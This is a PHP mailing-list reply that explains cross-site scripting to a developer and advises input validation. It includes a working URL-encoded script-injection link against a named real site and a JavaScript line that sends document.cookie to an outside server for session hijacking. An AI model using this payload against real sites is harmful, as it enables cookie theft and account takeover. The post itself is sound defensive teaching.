> > Or steal it. :) > > > > I hope you have checked your site for any cross-site scripting > > vulnerabilities. This is exactly where vulnerabilities like this come > > into play... > > Interesting -- I'm only a few days away from launching this... could you > elaborate on the potential risk, or point me to some documentation?
Just search google for Cross Site Scripting and you'll find a ton of articles about that specifically. It all comes down to validating user input and not displaying it directly back to the screen. Here is a link, for example, that'll pop up your cookies for cnn.com. (watch the wrapping!) http://cnn.looksmart.com/r_search?l&izch&qc=&col=cnni&qm=0&st=1&nh=10&rf =1&venue=all&keyword=&qp=&search=0&key=%3Cscript%3Ealert%28%27Hi%27%29%3 B%3C%2Fscript%3E Now, how about instead of just executing alert("Hi"), I do a location.href='www.myserver.com?var='+document.cookie; and send myself your cookie. Then I just simply make my cookie match yours, and poof, I'm you. :) It all comes down to validating user input and never showing it directly back to the browser/screen. Similar problems exist for variables you use in database queries... ---John Holmes... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
